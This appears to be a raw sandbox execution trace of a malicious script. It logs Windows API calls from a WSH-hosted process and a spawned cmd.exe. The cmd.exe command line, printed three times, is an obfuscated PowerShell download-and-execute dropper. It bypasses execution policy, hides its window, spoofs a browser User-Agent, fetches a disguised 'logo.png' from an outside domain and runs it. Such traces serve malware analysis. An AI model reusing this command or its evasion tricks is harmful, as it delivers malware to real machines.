	[0058.340] RegisterClassA (lpWndClass=0x64f830) returned 0x9006ac138
	[0058.340] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff430000, lpParam=0x665a60) returned 0x701b4
	[0058.340] GetWindowLongPtrA (hWnd=0x701b4, nIndex=-21) returned 0x0
	[0058.340] NtdllDefWindowProc_A (hWnd=0x701b4, Msg=0x24, wParam=0x0, lParam=0x64f220) returned 0x0
	[0058.340] GetWindowLongPtrA (hWnd=0x701b4, nIndex=-21) returned 0x0
	[0058.341] SetWindowLongPtrA (hWnd=0x701b4, nIndex=-21, dwNewLong=0x665a60) returned 0x0
	[0058.341] NtdllDefWindowProc_A (hWnd=0x701b4, Msg=0x81, wParam=0x0, lParam=0x64f1e0) returned 0x1
	[0058.342] GetWindowLongPtrA (hWnd=0x701b4, nIndex=-21) returned 0x665a60
	[0058.342] NtdllDefWindowProc_A (hWnd=0x701b4, Msg=0x83, wParam=0x0, lParam=0x64f240) returned 0x0
	[0058.344] GetWindowLongPtrA (hWnd=0x701b4, nIndex=-21) returned 0x665a60
	[0058.344] NtdllDefWindowProc_A (hWnd=0x701b4, Msg=0x1, wParam=0x0, lParam=0x64f1e0) returned 0x0
	[0058.344] SetEvent (hEvent=0xcc) returned 1
	[0058.380] GetMessageA (in: lpMsg=0x64f800, hWnd=0x701b4, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x64f800) returned 0
	[0059.812] GetWindowLongPtrA (hWnd=0x701b4, nIndex=-21) returned 0x665a60
	[0059.815] GetWindowLongPtrA (hWnd=0x701b4, nIndex=-21) returned 0x665a60

Thread:
	id = 116
	os_tid = 0x4fc


Thread:
	id = 117
	os_tid = 0x3c4


Thread:
	id = 118
	os_tid = 0x568


Thread:
	id = 119
	os_tid = 0x5fc


Thread:
	id = 120
	os_tid = 0x358


Thread:
	id = 121
	os_tid = 0x768


Thread:
	id = 122
	os_tid = 0x610


Process:
	id = "13"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x5ffdd000"
	os_pid = "0x538"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "12"
	os_parent_pid = "0x178"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 123
	os_tid = 0x5e0

	[0060.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f830 | out: lpSystemTimeAsFileTime=0x28f830*(dwLowDateTime=0x9c8ad620, dwHighDateTime=0x1d543d1)) 
	[0060.513] GetCurrentProcessId () returned 0x538
	[0060.513] GetCurrentThreadId () returned 0x5e0
	[0060.513] GetTickCount () returned 0x1ff16
	[0060.513] QueryPerformanceCounter (in: lpPerformanceCount=0x28f838 | out: lpPerformanceCount=0x28f838*=18493885142) returned 1
	[0060.514] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0060.514] __set_app_type (_Type=0x1) 
	[0060.514] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0060.515] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0060.515] GetCurrentThreadId () returned 0x5e0
	[0060.515] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e0) returned 0x3c
	[0060.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0060.515] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0060.515] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0060.516] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0060.516] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f7c8 | out: phkResult=0x28f7c8*=0x0) returned 0x2
	[0060.516] VirtualQuery (in: lpAddress=0x28f7b0, lpBuffer=0x28f730, dwLength=0x30 | out: lpBuffer=0x28f730*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0060.516] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f730, dwLength=0x30 | out: lpBuffer=0x28f730*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0060.516] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f730, dwLength=0x30 | out: lpBuffer=0x28f730*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0060.516] VirtualQuery (in: lpAddress=0x194000, lpBuffer=0x28f730, dwLength=0x30 | out: lpBuffer=0x28f730*(BaseAddress=0x194000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0060.516] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f730, dwLength=0x30 | out: lpBuffer=0x28f730*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0060.516] GetConsoleOutputCP () returned 0x1b5
	[0060.516] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0060.517] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0060.517] _get_osfhandle (_FileHandle=1) returned 0x7
	[0060.517] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0060.517] _get_osfhandle (_FileHandle=1) returned 0x7
	[0060.517] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0060.527] _get_osfhandle (_FileHandle=1) returned 0x7
	[0060.527] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0060.528] _get_osfhandle (_FileHandle=0) returned 0x3
	[0060.528] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0060.528] _get_osfhandle (_FileHandle=0) returned 0x3
	[0060.528] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0060.528] GetEnvironmentStringsW () returned 0x2f8f20*
	[0060.528] GetProcessHeap () returned 0x2e0000
	[0060.528] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xad4) returned 0x2f9a00
	[0060.528] FreeEnvironmentStringsW (penv=0x2f8f20) returned 1
	[0060.528] GetProcessHeap () returned 0x2e0000
	[0060.529] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x8) returned 0x2f87a0
	[0060.529] GetEnvironmentStringsW () returned 0x2f8f20*
	[0060.529] GetProcessHeap () returned 0x2e0000
	[0060.529] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xad4) returned 0x2fa4e0
	[0060.529] FreeEnvironmentStringsW (penv=0x2f8f20) returned 1
	[0060.529] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e688 | out: phkResult=0x28e688*=0x44) returned 0x0
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x0, lpData=0x28e6a0*=0x18, lpcbData=0x28e684*=0x1000) returned 0x2
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x1, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x0, lpData=0x28e6a0*=0x1, lpcbData=0x28e684*=0x1000) returned 0x2
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x0, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x40, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x40, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x0, lpData=0x28e6a0*=0x40, lpcbData=0x28e684*=0x1000) returned 0x2
	[0060.529] RegCloseKey (hKey=0x44) returned 0x0
	[0060.529] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e688 | out: phkResult=0x28e688*=0x44) returned 0x0
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x0, lpData=0x28e6a0*=0x40, lpcbData=0x28e684*=0x1000) returned 0x2
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x1, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.529] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x0, lpData=0x28e6a0*=0x1, lpcbData=0x28e684*=0x1000) returned 0x2
	[0060.530] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x0, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.530] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x9, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.530] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x4, lpData=0x28e6a0*=0x9, lpcbData=0x28e684*=0x4) returned 0x0
	[0060.530] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e680, lpData=0x28e6a0, lpcbData=0x28e684*=0x1000 | out: lpType=0x28e680*=0x0, lpData=0x28e6a0*=0x9, lpcbData=0x28e684*=0x1000) returned 0x2
	[0060.530] RegCloseKey (hKey=0x44) returned 0x0
	[0060.530] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e4b
	[0060.530] srand (_Seed=0x5d3b2e4b) 
	[0060.530] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0060.530] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0060.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0060.530] GetProcessHeap () returned 0x2e0000
	[0060.530] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2f8f20
	[0060.530] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f8f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0060.530] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0060.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0060.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0060.531] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0060.531] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0060.531] GetProcessHeap () returned 0x2e0000
	[0060.531] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9a00 | out: hHeap=0x2e0000) returned 1
	[0060.531] GetEnvironmentStringsW () returned 0x2f9140*
	[0060.531] GetProcessHeap () returned 0x2e0000
	[0060.531] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaec) returned 0x2fbad0
	[0060.531] FreeEnvironmentStringsW (penv=0x2f9140) returned 1
	[0060.531] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0060.531] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0060.531] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0060.531] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0060.531] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0060.531] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0060.532] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0060.532] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0060.532] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0060.532] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0060.532] GetProcessHeap () returned 0x2e0000
	[0060.532] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x48) returned 0x2f8d80
	[0060.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f490 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0060.532] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x28f490, lpFilePart=0x28f470 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x28f470*="Documents") returned 0x1b
	[0060.532] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0060.532] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f1a0 | out: lpFindFileData=0x28f1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x2fc5d0
	[0060.532] FindClose (in: hFindFile=0x2fc5d0 | out: hFindFile=0x2fc5d0) returned 1
	[0060.532] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x28f1a0 | out: lpFindFileData=0x28f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x2fc5d0
	[0060.532] FindClose (in: hFindFile=0x2fc5d0 | out: hFindFile=0x2fc5d0) returned 1
	[0060.532] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x28f1a0 | out: lpFindFileData=0x28f1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x2fc5d0
	[0060.533] FindClose (in: hFindFile=0x2fc5d0 | out: hFindFile=0x2fc5d0) returned 1
	[0060.533] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0060.533] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0060.533] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0060.533] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0060.533] GetProcessHeap () returned 0x2e0000
	[0060.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fbad0 | out: hHeap=0x2e0000) returned 1
	[0060.533] GetEnvironmentStringsW () returned 0x2fafd0*
	[0060.533] GetProcessHeap () returned 0x2e0000
	[0060.533] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb2c) returned 0x2fbb10
	[0060.533] FreeEnvironmentStringsW (penv=0x2fafd0) returned 1
	[0060.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0060.533] GetProcessHeap () returned 0x2e0000
	[0060.533] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8d80 | out: hHeap=0x2e0000) returned 1
	[0060.533] GetProcessHeap () returned 0x2e0000
	[0060.533] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4016) returned 0x2fc650
	[0060.534] GetProcessHeap () returned 0x2e0000
	[0060.534] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x260) returned 0x2f9c80
	[0060.534] GetProcessHeap () returned 0x2e0000
	[0060.534] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fc650 | out: hHeap=0x2e0000) returned 1
	[0060.534] GetConsoleOutputCP () returned 0x1b5
	[0060.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0060.534] GetUserDefaultLCID () returned 0x409
	[0060.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0060.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f5a0, cchData=128 | out: lpLCData="0") returned 2
	[0060.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f5a0, cchData=128 | out: lpLCData="0") returned 2
	[0060.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f5a0, cchData=128 | out: lpLCData="1") returned 2
	[0060.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0060.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0060.535] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0060.535] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0060.536] GetProcessHeap () returned 0x2e0000
	[0060.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20c) returned 0x2f9f60
	[0060.536] GetConsoleTitleW (in: lpConsoleTitle=0x2f9f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0060.541] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0060.541] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0060.541] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0060.541] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0060.541] GetProcessHeap () returned 0x2e0000
	[0060.541] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2fc650
	[0060.541] GetProcessHeap () returned 0x2e0000
	[0060.541] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4010) returned 0x300670
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1a) returned 0x2f49a0
	[0060.542] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f49a0 | out: hHeap=0x2e0000) returned 1
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x300670 | out: hHeap=0x2e0000) returned 1
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4010) returned 0x300670
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1a) returned 0x2f49a0
	[0060.542] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f49a0 | out: hHeap=0x2e0000) returned 1
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x300670 | out: hHeap=0x2e0000) returned 1
	[0060.542] GetProcessHeap () returned 0x2e0000
	[0060.542] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fc650 | out: hHeap=0x2e0000) returned 1
	[0060.544] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0060.544] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0060.544] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0060.544] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0060.544] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0060.544] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0060.544] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0060.544] GetProcessHeap () returned 0x2e0000
	[0060.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2fa180
	[0060.544] GetProcessHeap () returned 0x2e0000
	[0060.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x30) returned 0x2f69a0
	[0060.544] GetProcessHeap () returned 0x2e0000
	[0060.544] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x14) returned 0x2f8d80
	[0060.545] GetProcessHeap () returned 0x2e0000
	[0060.545] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2fa240
